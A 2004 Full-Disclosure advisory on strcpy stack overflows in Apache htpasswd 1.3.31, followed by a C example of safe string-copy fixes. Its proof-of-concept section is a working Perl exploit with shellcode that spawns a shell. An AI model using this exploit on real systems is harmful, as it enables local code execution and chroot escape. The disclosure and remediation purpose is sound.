
| Subject: | [Full-Disclosure] FlowSecurity.org: Local Stack Overflow on htpasswd apache 1.3.31 advisory. |
|---|---|
| Date: | Thu, 16 Sep 2004 13:23:03 -0300 |
**********************************************************************************************
Flow Security
foxtrot@flowsecurity.org
September 16th, 2004
Luiz Fernando Camargo
-----------------------------------------------------------------------------------------------------------------------------
Package Name: Apache htpasswd
Vendor URL: http://www.apache.org
Vendor Notified: Two months ago, but we got no answer.
Date: 2004-09-16
ID: FST-#0001
Affected Version: 1.3.31 and prior versions.
Risk: Execute arbitrary command, maybe evade apache chroot()
**********************************************************************************************
[01] Package Description
[02] The problem
[03] Possibilities
[04] Solution
[05] Proof of Concept
[06] Credits
[01] Short Description
Since htpasswd is part of the Apache software, here is the Apache description.
Apache has been the most popular web server on the Internet since
April of 1996. The October 2003 Netcraft Web Server Survey found that
more than 64% of the web sites on the Internet are using Apache, thus
making it more widely used than all other web servers combined.
[02] The problem
In apache/src/support/htpasswd.c, lots of problems with strcpy were found.
Unchecked buffers holding the user and passwd variables may let an attacker
take advantage of them.
[03] Possibilities
htpasswd is not setuid root by default, and it doesn't make any sense to
do it yourself. So you can't gain root by exploiting these bugs directly.
However, you can get out of Apache's chroot environment, since
htpasswd usually resides in that environment.
[04] Solution
Take a good look at the strcpy calls and maybe change them to strncpy.
[05] Proof of Concept
-------cut-------cut-------cut-------cut-------cut-------cut-------cut-------cut-------cut-------
#!/usr/bin/perl
# Proof Of Concept exploit for htpasswd of Apache.
# Read the advisory for more information.
# - Luiz Fernando Camargo
# - foxtrot@flowsecurity.org
$shellcode = "\x31\xdb\x6a\x17\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68".
"\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
$target = "/usr/local/apache/bin/htpasswd";
$retaddr = 0xbffffffa - length($shellcode) - length($target);
print "using retaddr = 0x", sprintf('%lx',($retaddr)), "\r\n";
local($ENV{'XXX'}) = $shellcode;
$newret = pack('l', $retaddr);
$buffer = "A" x 272;
$buffer .= $newret x 4;
$buffer .= " ";
$buffer .= "B" x 290;
exec("$target -nb $buffer");
-------cut-------cut-------cut-------cut-------cut-------cut-------cut-------cut-------cut-------
[06] Credits
Jefferson Cachinel
Thyago Silva
Rodrigo Rubira Branco
Adriano Lima
Jardir ph0enix
cheers,
Luiz Fernando Camargo
www.flowsecurity.org
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
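The advisory's fix suggestion (strcpy to strncpy) has a well-known pitfall that the message does not mention: strncpy does not write a terminating NUL when the source fills the whole buffer. The following is an added example, not part of the advisory and not Apache's htpasswd.c; the buffer size, function names and the command-line handling are constructed for illustration only. It shows the unchecked-copy pattern the advisory describes, the strncpy replacement with explicit termination, and a length-checking variant that rejects over-long input instead of silently truncating it.

```c
#include <stdio.h>
#include <string.h>

/* Constructed illustration of the bug class the advisory describes:
 * an unchecked strcpy of a command-line argument into a fixed-size
 * stack buffer. This is NOT the htpasswd.c source; MAX_STRING_LEN
 * is an assumed size chosen for the example. */
#define MAX_STRING_LEN 256

/* Vulnerable pattern: copies however many bytes the caller supplies.
 * An argument longer than dst overwrites whatever follows it on the
 * stack (saved registers, return address). */
void copy_unchecked(char *dst, const char *src)
{
    strcpy(dst, src);   /* no bounds check at all */
}

/* Hardened variant 1 (the advisory's suggestion): strncpy, plus the
 * explicit terminator that strncpy does NOT write when src is at
 * least dst_size bytes long. Over-long input is silently truncated. */
void copy_truncating(char *dst, size_t dst_size, const char *src)
{
    strncpy(dst, src, dst_size - 1);
    dst[dst_size - 1] = '\0';
}

/* Hardened variant 2: refuse over-long input instead of truncating.
 * For a credential tool this is the better choice, because a silently
 * truncated user name or password is a correctness bug of its own.
 * Returns 0 on success, -1 if the input does not fit. */
int copy_checked(char *dst, size_t dst_size, const char *src)
{
    size_t n = strlen(src);
    if (n >= dst_size)          /* need room for the terminator too */
        return -1;
    memcpy(dst, src, n + 1);    /* n bytes plus the NUL */
    return 0;
}

/* Stand-alone demo: validate argv[1] before using it as a user name.
 * "alice" is a constructed default so the program runs without args. */
int main(int argc, char **argv)
{
    char user[MAX_STRING_LEN];
    const char *arg = argc > 1 ? argv[1] : "alice";

    if (copy_checked(user, sizeof user, arg) != 0) {
        fprintf(stderr, "user name too long (max %d bytes)\n",
                MAX_STRING_LEN - 1);
        return 1;
    }
    printf("user = %s\n", user);
    return 0;
}
```

When reviewing a fix of this kind, check each replaced call for two things: that the length passed to strncpy leaves room for the terminator and that the terminator is written explicitly; and that truncation is acceptable for that particular field, since for user names and passwords it usually is not and an explicit length check with an error path is preferable.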